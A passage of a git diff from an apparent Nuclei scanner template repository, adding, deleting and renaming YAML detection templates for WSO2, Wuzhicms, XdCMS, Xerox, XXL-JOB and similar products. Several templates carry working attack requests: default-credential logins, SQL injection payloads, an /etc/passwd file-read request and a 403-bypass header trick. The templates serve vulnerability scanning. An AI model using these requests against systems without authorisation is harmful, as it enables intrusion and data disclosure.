"JSESSIONID" - part: header - condition: and diff --git a/nuclei-templates/Other/wso2-default-login-11643.yaml b/nuclei-templates/Other/wso2-default-login-11643.yaml new file mode 100644 index 0000000000..525f6e9bfd --- /dev/null +++ b/nuclei-templates/Other/wso2-default-login-11643.yaml @@ -0,0 +1,29 @@ +id: wso2-default-login +info: + name: WSO2 Management Console Default Login + author: cocxanh + severity: high + reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console + tags: default-login,wso2 +requests: + - raw: + - | + POST /carbon/admin/login_action.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + redirects: false + matchers: + - type: word + words: + - "/carbon/admin/index.jsp?loginStatus=true" + - "JSESSIONID" + part: header + condition: and diff --git a/nuclei-templates/Other/wso2-management-console-11644.yaml b/nuclei-templates/Other/wso2-management-console-11644.yaml new file mode 100644 index 0000000000..e356b987f5 --- /dev/null +++ b/nuclei-templates/Other/wso2-management-console-11644.yaml @@ -0,0 +1,30 @@ +id: wso2-management-console +info: + name: WSO2 Management Console + author: dhiyaneshDK,johnk3r + severity: info + reference: + - https://www.exploit-db.com/ghdb/5691 + metadata: + shodan-query: http.favicon.hash:1398055326 + tags: panel,wso2 +requests: + - method: GET + path: + - '{{BaseURL}}/carbon/admin/login.jsp' + matchers-condition: and + matchers: + - type: word + part: response + words: + - "WSO2 Management Console" + - "WSO2 Carbon Server" + condition: or + - type: status + status: + - 200 + extractors: + - type: kval + part: header + kval: + - server diff --git a/nuclei-templates/Other/wso2-management-console-11645.yaml b/nuclei-templates/Other/wso2-management-console-11645.yaml deleted file mode 100644 index 4fb6fc2da1..0000000000 --- a/nuclei-templates/Other/wso2-management-console-11645.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wso2-management-console - -info: - name: WSO2 Management Console - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/5691 - tags: panel,wso2 - -requests: - - method: GET - path: - - '{{BaseURL}}/carbon/admin/login.jsp' - - matchers-condition: and - matchers: - - type: word - words: - - 'WSO2 Management Console' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wufoo-takeover-11648.yaml b/nuclei-templates/Other/wufoo-takeover-11648.yaml deleted file mode 100644 index b9ed03421b..0000000000 --- a/nuclei-templates/Other/wufoo-takeover-11648.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: wufoo-takeover -info: - name: wufoo takeover detection - author: pdteam - severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Profile not found - - Hmmm....something is not right. - condition: and diff --git a/nuclei-templates/Other/wufoo-takeover-11649.yaml b/nuclei-templates/Other/wufoo-takeover-11649.yaml new file mode 100644 index 0000000000..eae61b2336 --- /dev/null +++ b/nuclei-templates/Other/wufoo-takeover-11649.yaml @@ -0,0 +1,20 @@ +id: wufoo-takeover + +info: + name: wufoo takeover detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - Profile not found + - Hmmm....something is not right. + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/wuzhicms-detect-11655.yaml b/nuclei-templates/Other/wuzhicms-detect-11655.yaml deleted file mode 100644 index d89a84be8c..0000000000 --- a/nuclei-templates/Other/wuzhicms-detect-11655.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: wuzhicms-detect -info: - name: Wuzhicms Detected - description: Wuzhicms was detected. - author: pikpikcu - severity: info - tags: tech,wuzhicms - remediation: Ensure you are using the latest version and that all security patches have been applied. - reference: https://www.cvedetails.com/vendor/17848/Wuzhicms.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Powered by wuzhicms" - - "五指CMS" - condition: or - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/10 diff --git a/nuclei-templates/Other/wuzhicms-detect.yaml b/nuclei-templates/Other/wuzhicms-detect.yaml new file mode 100644 index 0000000000..ef54b2627d --- /dev/null +++ b/nuclei-templates/Other/wuzhicms-detect.yaml @@ -0,0 +1,24 @@ +id: wuzhicms-detect + +info: + name: Wuzhicms Detect + author: pikpikcu + severity: info + tags: tech,wuzhicms + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Powered by wuzhicms" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wuzhicms-sqli-11656.yaml b/nuclei-templates/Other/wuzhicms-sqli-11656.yaml deleted file mode 100644 index 4b776ad378..0000000000 --- a/nuclei-templates/Other/wuzhicms-sqli-11656.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wuzhicms-sqli -info: - name: Wuzhicms v4.1.0 SQL Injection - author: princechaddha - severity: high - reference: - - https://github.com/wuzhicms/wuzhicms/issues/184 - tags: wuzhicms,sqli -requests: - - method: GET - path: - - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "81dc9bdb52d04dc20036dbd8313ed05" - - "sql_error:MySQL Query Error" - part: body - condition: and diff --git a/nuclei-templates/Other/wuzhicms-sqli-11659.yaml b/nuclei-templates/Other/wuzhicms-sqli-11659.yaml new file mode 100644 index 0000000000..fbb326fda5 --- /dev/null +++ b/nuclei-templates/Other/wuzhicms-sqli-11659.yaml @@ -0,0 +1,22 @@ +id: wuzhicms-sqli +info: + name: Wuzhicms v4.1.0 SQL Injection + author: princechaddha + severity: high + reference: https://github.com/wuzhicms/wuzhicms/issues/184 + tags: wuzhicms,sqli +requests: + - method: GET + path: + - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "81dc9bdb52d04dc20036dbd8313ed05" + - "sql_error:MySQL Query Error" + part: body + condition: and diff --git a/nuclei-templates/Other/host-header-injection-8000.yaml b/nuclei-templates/Other/x-forwarded-host-injection.yaml similarity index 100% rename from nuclei-templates/Other/host-header-injection-8000.yaml rename to nuclei-templates/Other/x-forwarded-host-injection.yaml diff --git a/nuclei-templates/Other/xampp-default-page-11661.yaml b/nuclei-templates/Other/xampp-default-page-11663.yaml similarity index 100% rename from nuclei-templates/Other/xampp-default-page-11661.yaml rename to nuclei-templates/Other/xampp-default-page-11663.yaml diff --git a/nuclei-templates/Other/xdcms-sqli-11664.yaml b/nuclei-templates/Other/xdcms-sqli-11664.yaml deleted file mode 100644 index c0204fd48c..0000000000 --- a/nuclei-templates/Other/xdcms-sqli-11664.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: xdcms-sqli - -info: - name: XdCMS SQL Injection - author: pikpikcu - severity: high - reference: https://www.uedbox.com/post/35188/ - tags: sqli,xdcms - -requests: - - method: POST - path: - - "{{BaseURL}}/index.php?m=member&f=login_save" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+ - - matchers-condition: and - matchers: - - - type: word - words: - - "Content-Type: text/html" - part: header - - - type: word - words: - - "707564257851522176" - - "XPATH syntax error:" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/xdcms-sqli-11666.yaml b/nuclei-templates/Other/xdcms-sqli-11666.yaml new file mode 100644 index 0000000000..d2b077214b --- /dev/null +++ b/nuclei-templates/Other/xdcms-sqli-11666.yaml @@ -0,0 +1,38 @@ +id: xdcms-sqli + +info: + name: XdCMS SQL Injection + author: pikpikcu + severity: high + reference: + - https://www.uedbox.com/post/35188/ + tags: sqli,xdcms + +variables: + num: "999999999" + +requests: + - method: POST + path: + - "{{BaseURL}}/index.php?m=member&f=login_save" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+ + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/html" + part: header + + - type: word + words: + - '{{md5({{num}})}}' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/xds-amr-status-11668.yaml b/nuclei-templates/Other/xds-amr-status-11668.yaml new file mode 100644 index 0000000000..a7f548a112 --- /dev/null +++ b/nuclei-templates/Other/xds-amr-status-11668.yaml @@ -0,0 +1,31 @@ +id: xds-amr-status + +info: + name: XDS-AMR - status + author: pussycat0x + severity: info + metadata: + shodan-dork: 'http.title:"XDS-AMR - status"' + tags: panel,tech,xamr,xds + +requests: + - method: GET + path: + - "{{BaseURL}}/login.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'XDS-AMR - Status' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'XAMR\-([0-9]+)' diff --git a/nuclei-templates/Other/xds-amr-status-11669.yaml b/nuclei-templates/Other/xds-amr-status-11669.yaml deleted file mode 100644 index 85762f656a..0000000000 --- a/nuclei-templates/Other/xds-amr-status-11669.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: xds-amr-status -info: - name: XDS-AMR - status - author: pussycat0x - severity: info - metadata: - shodan-dork: 'http.title:"XDS-AMR - status"' - tags: panel,tech,xamr,xds - -requests: - - method: GET - path: - - "{{BaseURL}}/login.php" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'XDS-AMR - Status' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'XAMR\-([0-9]+)' diff --git a/nuclei-templates/Other/xenforo-login-11672.yaml b/nuclei-templates/Other/xenforo-login-11672.yaml new file mode 100644 index 0000000000..ba2db95aba --- /dev/null +++ b/nuclei-templates/Other/xenforo-login-11672.yaml @@ -0,0 +1,16 @@ +id: xenforo-login +info: + name: XenForo Login/Register + author: dhiyaneshDk + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22XenForo%22 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/index.php' + matchers: + - type: word + words: + - 'XenForo' + condition: and diff --git a/nuclei-templates/Other/xenforo-login.yaml b/nuclei-templates/Other/xenforo-login.yaml deleted file mode 100644 index fa2089d36c..0000000000 --- a/nuclei-templates/Other/xenforo-login.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: xenforo-login - -info: - name: XenForo Login/Register - author: dhiyaneshDk - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22XenForo%22 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php' - - matchers: - - type: word - words: - - 'XenForo' - condition: and diff --git a/nuclei-templates/Other/xenmobile-login-11675.yaml b/nuclei-templates/Other/xenmobile-login-11675.yaml deleted file mode 100644 index 08a1bd2e89..0000000000 --- a/nuclei-templates/Other/xenmobile-login-11675.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: xenmobile-login - -info: - name: Xenmobile Console Logon - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6675 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/zdm/login_xdm_uc.jsp' - - matchers-condition: and - matchers: - - type: word - words: - - 'XenMobile - Console - Logon' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/xenmobile-login.yaml b/nuclei-templates/Other/xenmobile-login.yaml new file mode 100644 index 0000000000..22d3ffb99d --- /dev/null +++ b/nuclei-templates/Other/xenmobile-login.yaml @@ -0,0 +1,19 @@ +id: xenmobile-login +info: + name: Xenmobile Console Logon + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6675 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/zdm/login_xdm_uc.jsp' + matchers-condition: and + matchers: + - type: word + words: + - 'XenMobile - Console - Logon' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/xerox-efi-lfi-11681.yaml b/nuclei-templates/Other/xerox-efi-lfi-11681.yaml deleted file mode 100644 index 59dd014c70..0000000000 --- a/nuclei-templates/Other/xerox-efi-lfi-11681.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: xerox-efi-lfi -info: - name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure - author: gy741 - severity: high - description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php - - https://packetstormsecurity.com/files/145570 - - https://www.exploit-db.com/exploits/43398/ - tags: iot,xerox,disclosure,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/xerox-efi-lfi.yaml b/nuclei-templates/Other/xerox-efi-lfi.yaml new file mode 100644 index 0000000000..3bed6e8b43 --- /dev/null +++ b/nuclei-templates/Other/xerox-efi-lfi.yaml @@ -0,0 +1,28 @@ +id: xerox-efi-lfi + +info: + name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure + author: gy741 + severity: high + description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary + files on the affected system. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php + - https://packetstormsecurity.com/files/145570 + - https://www.exploit-db.com/exploits/43398/ + tags: iot,xerox,disclosure,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/xerox7-default-login-11678.yaml b/nuclei-templates/Other/xerox7-default-login-11678.yaml deleted file mode 100644 index 7582cc1fa1..0000000000 --- a/nuclei-templates/Other/xerox7-default-login-11678.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: xerox7-default-login -info: - name: Xerox WorkCentre 7xxx Printer Default Login - author: MiroslavSotak - severity: high - description: Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered. - reference: - - https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: xerox,default-login -requests: - - raw: - - | - POST /userpost/xerox.set HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default - attack: pitchfork - payloads: - username: - - admin - password: - - 1111 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - "window.opener.top.location.pathname" - - "Xerox Corporation" - condition: and - - type: word - part: body - words: - - "invalid" - - "errmsg" - condition: or - negative: true - -# Enhanced by mp on 2022/03/13 diff --git a/nuclei-templates/Other/xerox7-default-login-11679.yaml b/nuclei-templates/Other/xerox7-default-login-11679.yaml new file mode 100644 index 0000000000..df0f8b2b1f --- /dev/null +++ b/nuclei-templates/Other/xerox7-default-login-11679.yaml @@ -0,0 +1,48 @@ +id: xerox7-default-login +info: + name: Xerox WorkCentre 7xxx Printer Default Login + author: MiroslavSotak + severity: high + description: "Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered." + tags: xerox,default-login + reference: + - https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /userpost/xerox.set HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default + attack: pitchfork + payloads: + username: + - admin + password: + - 1111 + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "window.opener.top.location.pathname" + - "Xerox Corporation" + condition: and + - type: word + part: body + words: + - "invalid" + - "errmsg" + condition: or + negative: true + +# Enhanced by mp on 2022/03/13 diff --git a/nuclei-templates/Other/xff-403-bypass-11684.yaml b/nuclei-templates/Other/xff-403-bypass-11684.yaml new file mode 100644 index 0000000000..02951e442d --- /dev/null +++ b/nuclei-templates/Other/xff-403-bypass-11684.yaml @@ -0,0 +1,30 @@ +id: xff-403-bypass +info: + name: X-Forwarded-For 403-forbidden bypass + author: vavkamil + severity: info + description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. + tags: fuzz +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 + - | + GET /test.txt HTTP/1.1 + Host: {{Hostname}} + Accept: */* + X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 403 && status_code_2 != 403" + - "status_code_1 == 403 && status_code_3 != 403" + condition: or diff --git a/nuclei-templates/Other/xff-403-bypass.yaml b/nuclei-templates/Other/xff-403-bypass.yaml deleted file mode 100644 index 7d54a12b98..0000000000 --- a/nuclei-templates/Other/xff-403-bypass.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: xff-403-bypass -info: - name: X-Forwarded-For 403-forbidden bypass - author: vavkamil - severity: info - description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. - tags: xff,bypass,fuzz -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close - Accept: */* - Accept-Language: en - Accept-Encoding: gzip - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close - Accept: */* - Accept-Language: en - Accept-Encoding: gzip - X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - - | - GET /test.txt HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close - Accept: */* - Accept-Language: en - Accept-Encoding: gzip - X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - req-condition: true - matchers: - - type: dsl - dsl: - - "status_code_1 == 403 && status_code_2 != 403" - - "status_code_1 == 403 && status_code_3 != 403" - condition: or diff --git a/nuclei-templates/Other/xml-schema-detect-11692.yaml b/nuclei-templates/Other/xml-schema-detect-11692.yaml new file mode 100644 index 0000000000..fae5f0e2ee --- /dev/null +++ b/nuclei-templates/Other/xml-schema-detect-11692.yaml @@ -0,0 +1,24 @@ +id: xml-schema-detect +info: + name: XML Schema Detection + author: alph4byt3 + severity: info + tags: misc + +requests: + - method: GET + path: + - "{{BaseURL}}/schema" + + matchers-condition: and + redirects: true + matchers: + - type: word + words: + - ".xsd" + - "Schemas" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/xml-schema-detect.yaml b/nuclei-templates/Other/xml-schema-detect.yaml deleted file mode 100644 index fb7dbe7f91..0000000000 --- a/nuclei-templates/Other/xml-schema-detect.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: xml-schema-detect -info: - name: XML Schema Detection - author: alph4byt3 - severity: info - tags: misc -requests: - - method: GET - path: - - "{{BaseURL}}/schema" - matchers-condition: and - redirects: true - matchers: - - type: word - words: - - ".xsd" - - "Schemas" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/xmlrpc-pingback-ssrf-11687.yaml b/nuclei-templates/Other/xmlrpc-pingback-ssrf.yaml similarity index 100% rename from nuclei-templates/Other/xmlrpc-pingback-ssrf-11687.yaml rename to nuclei-templates/Other/xmlrpc-pingback-ssrf.yaml diff --git a/nuclei-templates/Other/xp-webcam-11697.yaml b/nuclei-templates/Other/xp-webcam-11697.yaml new file mode 100644 index 0000000000..f225f44ead --- /dev/null +++ b/nuclei-templates/Other/xp-webcam-11697.yaml @@ -0,0 +1,22 @@ +id: xp-webcam +info: + name: XP Webcam Viewer Page + author: aashiq + severity: medium + description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body + tags: webcam,iot +requests: + - method: GET + path: + - "{{BaseURL}}/mobile.html" + matchers-condition: and + matchers: + - type: word + words: + - "webcams and ip cameras server for windows" + part: body + - type: word + words: + - "Please provide a valid username/password to access this server." + part: body + negative: true diff --git a/nuclei-templates/Other/xp-webcam-11699.yaml b/nuclei-templates/Other/xp-webcam-11699.yaml deleted file mode 100644 index f7578077c4..0000000000 --- a/nuclei-templates/Other/xp-webcam-11699.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: xp-webcam - -info: - name: XP Webcam Viewer Page - author: aashiq - severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. - tags: webcam,iot - -requests: - - method: GET - path: - - "{{BaseURL}}/mobile.html" - - matchers-condition: and - matchers: - - type: word - words: - - "webcams and ip cameras server for windows" - part: body - - - type: word - words: - - "Please provide a valid username/password to access this server." - part: body - negative: true diff --git a/nuclei-templates/Other/xprober-service-11694.yaml b/nuclei-templates/Other/xprober-service-11694.yaml index 7dc83ceae4..ca1f311d99 100644 --- a/nuclei-templates/Other/xprober-service-11694.yaml +++ b/nuclei-templates/Other/xprober-service-11694.yaml @@ -1,10 +1,12 @@ id: xprober-service + info: name: X Prober server information leakage author: pdteam severity: low tags: config,exposure reference: https://twitter.com/bugbounty_tips/status/1339984643517423616 + requests: - method: GET path: @@ -14,4 +16,4 @@ requests: words: - '"appName":"X Prober"' - 'X Prober' - condition: and + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/fuzzing-xss-get-params-html-injection.yaml b/nuclei-templates/Other/xss-fuzz-html-tag-injection.yaml similarity index 100% rename from nuclei-templates/Other/fuzzing-xss-get-params-html-injection.yaml rename to nuclei-templates/Other/xss-fuzz-html-tag-injection.yaml diff --git a/nuclei-templates/Other/xss-prober.yaml b/nuclei-templates/Other/xss-prober.yaml new file mode 100644 index 0000000000..ebebdf4a57 --- /dev/null +++ b/nuclei-templates/Other/xss-prober.yaml @@ -0,0 +1,18 @@ +id: basic-xss-prober + +info: + name: Basic XSS Prober + author: nadino + severity: low + + # Basic XSS prober + # Manual testing needed for exploitation + +requests: + - method: GET + path: + - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e" + matchers: + - type: word + words: + - "'><injectable>" diff --git a/nuclei-templates/Other/xvr-login-11702.yaml b/nuclei-templates/Other/xvr-login-11705.yaml similarity index 100% rename from nuclei-templates/Other/xvr-login-11702.yaml rename to nuclei-templates/Other/xvr-login-11705.yaml diff --git a/nuclei-templates/Other/xxljob-admin-detect-11708.yaml b/nuclei-templates/Other/xxljob-admin-detect-11708.yaml new file mode 100644 index 0000000000..0c4858b393 --- /dev/null +++ b/nuclei-templates/Other/xxljob-admin-detect-11708.yaml @@ -0,0 +1,23 @@ +id: xxljob-admin-detect + +info: + name: XXLJOB Admin Login + author: pdteam + severity: info + tags: tech,xxljob + +requests: + - method: GET + path: + - "{{BaseURL}}/xxl-job-admin/toLogin" + + matchers-condition: and + matchers: + + - type: word + words: + - "<a><b>XXL</b>JOB</a>" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/xxljob-admin-detect.yaml b/nuclei-templates/Other/xxljob-admin-detect.yaml deleted file mode 100644 index 78b88db83b..0000000000 --- a/nuclei-templates/Other/xxljob-admin-detect.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: xxljob-admin-detect -info: - name: XXLJOB Admin Login - author: pdteam - severity: info - tags: tech,xxljob -requests: - - method: GET - path: - - "{{BaseURL}}/xxl-job-admin/toLogin" - matchers-condition: and - matchers: - - type: word - words: - - "<a><b>XXL</b>JOB</a>" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/xxljob-default-login-11712.yaml b/nuclei-templates/Other/xxljob-default-login-11712.yaml deleted file mode 100644 index a39da3f308..0000000000 --- a/nuclei-templates/Other/xxljob-default-login-11712.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: xxljob-default-login -info: - name: XXL-JOB Default Login - author: pdteam,ritikchaddha - severity: high - description: XXL-JOB default admin credentials were discovered. - reference: - - https://github.com/xuxueli/xxl-job - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - verified: true - shodan-query: http.favicon.hash:1691956220 - tags: default-login,xxljob -requests: - - raw: - - | - POST /xxl-job-admin/login HTTP/1.1 - Host:{{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - userName={{username}}&password={{password}} - - | - POST /login HTTP/1.1 - Host:{{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - userName={{username}}&password={{password}} - attack: pitchfork - payloads: - username: - - admin - password: - - 123456 - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - '"code":200' - - '"msg"' - - '"content"' - condition: and - - type: word - part: header - words: - - 'application/json' - - 'XXL_JOB_LOGIN_IDENTITY' - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/14 diff --git a/nuclei-templates/Other/xxljob-default-login-11714.yaml b/nuclei-templates/Other/xxljob-default-login-11714.yaml new file mode 100644 index 0000000000..ece0cabd03 --- /dev/null +++ b/nuclei-templates/Other/xxljob-default-login-11714.yaml @@ -0,0 +1,33 @@ +id: xxljob-default-login +info: + name: XXL-JOB default login + author: pdteam + severity: high + tags: default-login,xxljob + reference: https://github.com/xuxueli/xxl-job +requests: + - raw: + - | + POST /xxl-job-admin/login HTTP/1.1 + Host:{{Hostname}} + Content-Length: 30 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + userName=admin&password=123456 + matchers-condition: and + matchers: + - type: word + words: + - '"code":200' + - '"msg"' + - '"content"' + condition: and + - type: word + words: + - 'application/json' + - 'XXL_JOB_LOGIN_IDENTITY' + part: header + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/xxljob-panel-11715.yaml b/nuclei-templates/Other/xxljob-panel-11715.yaml new file mode 100644 index 0000000000..9314bb88f1 --- /dev/null +++ b/nuclei-templates/Other/xxljob-panel-11715.yaml @@ -0,0 +1,30 @@ +id: xxljob-panel +info: + name: XXLJOB Admin Login Panel + author: pdteam,daffainfo,ritikchaddha + severity: info + metadata: + verified: true + shodan-query: http.favicon.hash:1691956220 + tags: panel,xxljob,login +requests: + - method: GET + path: + - "{{BaseURL}}/xxl-job-admin/toLogin" + - "{{BaseURL}}/toLogin" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<a><b>XXL</b>JOB</a>" + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '"admin_version":"(.*?)"' diff --git a/nuclei-templates/Other/xxljob-panel-11716.yaml b/nuclei-templates/Other/xxljob-panel-11716.yaml deleted file mode 100644 index b201c80c37..0000000000 --- a/nuclei-templates/Other/xxljob-panel-11716.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: xxljob-panel - -info: - name: XXLJOB Admin Login Panel - Detect - author: pdteam,daffainfo,ritikchaddha - severity: info - description: XXLJOB admin login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - cpe: cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - product: xxl-job - shodan-query: http.favicon.hash:1691956220 - vendor: xuxueli - verified: true - tags: panel,xxljob,login,xuxueli - -http: - - method: GET - path: - - "{{BaseURL}}/xxl-job-admin/toLogin" - - "{{BaseURL}}/toLogin" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<a><b>XXL</b>JOB</a>" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"admin_version":"(.*?)"' -# digest: 490a00463044022010c064978e8e3e58a88c3d260f7bf8bb03bb8d5b926391dcfb01eae435492040022064e715c95d685c1919be02798141589fa0128a4e647d59d326e213fedc009e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/yapi-detect-11720.yaml b/nuclei-templates/Other/yapi-detect-11720.yaml deleted file mode 100644 index 8cf92f5a49..0000000000 --- a/nuclei-templates/Other/yapi-detect-11720.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: yapi-detect -info: - name: YApi Detect - author: pikpikcu - 